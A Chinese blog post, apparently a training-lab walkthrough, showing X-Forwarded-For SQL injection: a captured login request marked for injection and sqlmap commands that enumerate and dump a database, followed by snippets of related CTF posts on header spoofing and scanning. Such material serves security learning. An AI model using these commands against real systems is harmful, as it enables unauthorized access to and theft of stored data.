X-Forwarded-For注入实战

最新推荐文章于 2024-06-25 08:33:31 发布
最新推荐文章于 2024-06-25 08:33:31 发布
阅读量6.7k 收藏 6
点赞数 1
分类专栏: 网安注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38807738/article/details/80602672
版权

X-Forwarded-For注入漏洞实战

1、使用BurpSuite抓包


POST /index.php HTTP/1.1

Host: 219.153.49.228:47065

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Content-Type: application/x-www-form-urlencoded

Content-Length: 30

Referer: http://219.153.49.228:47065/index.php

X-Forwarded-For: *

Cookie: td_cookie=18446744069934562792; wp-settings-1=editor%3Dhtml; wp-settings-time-1=1526740792

Connection: close

Upgrade-Insecure-Requests: 1


username=admin&password=123456


将上面的信息保存在txt文件中



2、使用sqlmap进行注入


爆数据库

sqlmap -r xxx.txt --dbs --batch


爆表名

sqlmap -r xxx.txt -D 数据库名 --table --batch


爆表中的字段

sqlmap -r xxx.txt -D 数据库名 -T 表名 --columns --batch


爆字段中的值

sqlmap -r xxx.txt -D 数据库名 -T 表名 -C '字段名' --dump --batch

shadow_pedestrian
关注
专栏目录
墨者学院-X-Forwarded-For注入漏洞实战
weixin_42939822的博客
03-27 6363
墨者学院-X-Forwarded-For注入漏洞实战
【墨者】X-Forwarded-For注入漏洞实战
weixin_48621644的博客
09-11 1337
小羊学安全 任重而道远 ~
墨者 - X-Forwarded-For注入漏洞实战
qq_24481913的博客
07-31 472
X-Forwarded-For:简称XFF头,代表了HTTP的请求端真实的IP。它被认为是客户端通过HTTP代理或者负载均衡器连接到web服务端获取源ip地址的一个标准(通常一些网站的防注入功能会记录请求端真实IP地址并写入数据库或某文件[通过修改XXF头可以实现伪造IP])。XFF,是X-Forwarded-for的缩写,属于SQL注入的一种,该注入原理是通过修改X-Forwarded-for头对带入系统的dns进行sql注入,达到欺骗服务器执行恶意的SQL命令的效果,从而可以得到网站的数据库内容。
CTF-SQL注入-X-Forwarded-For报文头
whatiwhere的博客
12-02 1322
nmap -sV xxxxx nmap -T4 -A -v xxxx nikto -host http://192.168.173.134/ 发现了后台登陆地址,但弱口令无法登陆 使用awvs扫描 安全漏洞 高危漏洞 盲注 使用sqlmap进行 注入 sqlmap -u “http://192.168.176.134/” --headers=“X-Forwarded-For:*” -...
22款burpsuite常用插件(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
06-25 4787
前言Burp Suite是一款强大的用于Web应用程序安全测试的工具。Burp Suite的一个关键特性是通过扩展功能的使用来扩展其功能。这些扩展允许用户自定义Burp Suite以满足他们特定需求,简化他们的工作流程。此外,扩展可用于将Burp Suite与其他工具和平台集成,扩大安全测试的范围和效率。使用Burp Suite扩展还可以帮助消除手动任务,节省安全专业人员的时间和资源。
【CTF】X-Forwarded-For SQL注入实战
HAPPY
07-30 4658
1.首先burp抓包,分析post包,保存为txt文件 (可看这个 https://blog.csdn.net/u014549283/article/details/81290015 ,此处用 -r 参数) 2、使用sqlmap进行注入 爆数据库 sqlmap -r xxx.txt --dbs --batch   爆表名 sqlmap -r xxx.txt -D 数据库名 --tab...
bugku 管理员的系统(X-forwarded-for)
wssmiss的博客
07-21 268
管理员的系统 猜测应该要使用本地ip访问 想到XFF,详细知识请移步大佬网页 于是用burpsuit抓包,抓包后改写报头,加入X-Forward-For:127.0.0.1 伪造是本地ip请求服务器 之后在这里卡了很久,没有其他线索,也拿不到flag,直到,,,我打开了网页源代码!!! base64解码后test123猜测可能是管理员密码 Go一下,得到flag ...
XCTF篇(新手练习)Web之xff_referer
qq_43230425的博客
09-20 631
XCTF篇(新手练习)Web之xff_referer 题目: 打开场景后为: 根据题目提示,简单了解一下xff和referer: HTTP来源地址(referer,或HTTP referer) 是HTTP表头的一个字段,用来表示从哪儿链接到当前的网页,采用的格式是URL。换句话说,借着HTTP来源地址,当前的网页可以检查访客从哪里而来,这也常被用来对付伪造的跨网站请求。 X-Forwarded-For(XFF) 是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的H
墨者学院 ——X-Forwarded-For注入漏洞实战
知足且坚定,温柔且上进
02-09 702
前言: 小白昨天在利用sqlmap注入的时候,死活不成功(连接超时),把我搞崩溃了,今天又试了一下还是如此。 当我把小飞机(科学上网)关了,再次尝试,成功了!所以如果和我有一样状况的新手们可要注意这个问题哦。 步骤一: 利用burpsuite抓包并且发送到reperter, 添加x-forwarded-for:* 1.将Request的Raw内容复制到自己新建的一个txt文档,命名为x...
【墨者学院】X-Forwarded-For注入漏洞实战
hehigoxqc606的博客
08-31 909
【墨者学院】X-Forwarded-For注入漏洞实战 漏洞原理: 利用HTTP头部注入、sqlmap注入等方式,爆破数据库表中的用户账号和密码,以登陆系统,很有可能对系统有下一步的破坏。 实战过程: 第一步:访问链接 第二步:抓取数据包,可以看到登陆失败,并提示登陆的IP地址 第三步:利用X-Forwarded-For头伪装127.0.0.1进行测试 第四步:复制RAW文件到xff.txt中,这里构造的X-Forward...
攻防世界-xff_referer
m0_49025459的博客
12-30 275
抓包看看,打开场景,页面提示我们ip必须是123.123.123.123,我们就想到burpsuite抓包,添加上X-Forwarded-For:123.123.123.123。我们看到页面提示必须来自https://www.google.com,那我们添加Referer:https://www.google.com。
红队打靶:Me and My Girlfriend打靶思路详解(vulnhub)
Bossfrank的博客
09-15 635
本文是vulhub靶机Me and My Girlfriend的打靶思路详解。本靶机较为容易,很明显的渗透攻击链,读者可直接盲打。涉及到的知识点包括XFF头转发的原理与使用、手工爆库、sudo php提权等。
渗透必学神器:BurpSuite教程(超详细)
2301_77472496的博客
11-13 8308
Burp Suite (简称BP,下同)是用于攻击web 应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。从本节开始将为大家陆续带来BP各个模块的使用说明。
X-Forwarded-For
yuange
04-25 7349
问题背景 在Web应用开发中,经常会需要获取客户端IP地址。一个典型的例子就是投票系统,为了防止刷票,需要限制每个IP地址只能投票一次。 如何获取客户端IP 在Java中,获取客户端IP最直接的方式就是使用request.getRemoteAddr()。这种方式能获取到连接服务器的客户端IP,在中间没有代理的情况下,的确是最简单有效的方式。但是目前互联网Web应用很少会将应用服务器直接对外提...
攻防世界6-10题
yxltx_的博客
11-12 401
第六题
X老师告诉小宁其实xff和referer是可以伪造的。brup重放不了的替代方法
qq_40421504的博客
08-11 195
于是自然想到了hackbar,这个东东,之前做请求方式的题用过这个,琢磨了一下,发现操作性成立。进行操作,完美拿到flag。PS:没有的请求头可以用自定义添加的方式加上去。在使用brup进行重放的时候,发现发送按钮变灰了但是结果没出来,从多角度进行了排查都没发现问题,于是上网找了下资料,说是环境和app问题,没法了,只有找了个替代的办法。在做这个题的时候遇到了这个问题,
XCTF攻防世界练习区-web题-xff_referer
热门推荐
果冻先生的专栏
09-30 2万+
0x08 XFF Referer 【题目描述】 X老师告诉小宁其实xff和referer是可以伪造的。 【目标】 掌握有关X-Forwarded-For和Referer的知识: (1)X-Forwarded-For:简称XFF头,它代表客户端,也就是HTTP的请求端真实的IP,只有在通过了HTTP 代理或者负载均衡服务器时才会添加该项。xff 是http的拓展头部,作用是使Web服务...
XCTF2-web xff_referer
orchid_sea的博客
11-28 316
XFF的作用是使Web服务器获取访问用户的IP真实地址(可伪造)。由于很多用户通过代理服务器进行访问,服务器只能获取代理服务器的IP地址,而xff的作用在于记录用户的真实IP,以及代理服务器的IP。HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。
WEB安全学习第二天:BurpSuit的使用
weixin_43171447的博客
04-16 656
BurpSuit完成简单CTF题目
x-forwarded-for注入漏洞实战
03-17
x-forwarded-for注入漏洞是一种常见的网络安全漏洞,攻击者可以通过伪造HTTP请求头中的x-forwarded-for字段,来绕过IP地址过滤和访问控制,从而实现攻击目标系统的目的。攻击者可以利用这个漏洞来进行各种攻击,比如...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值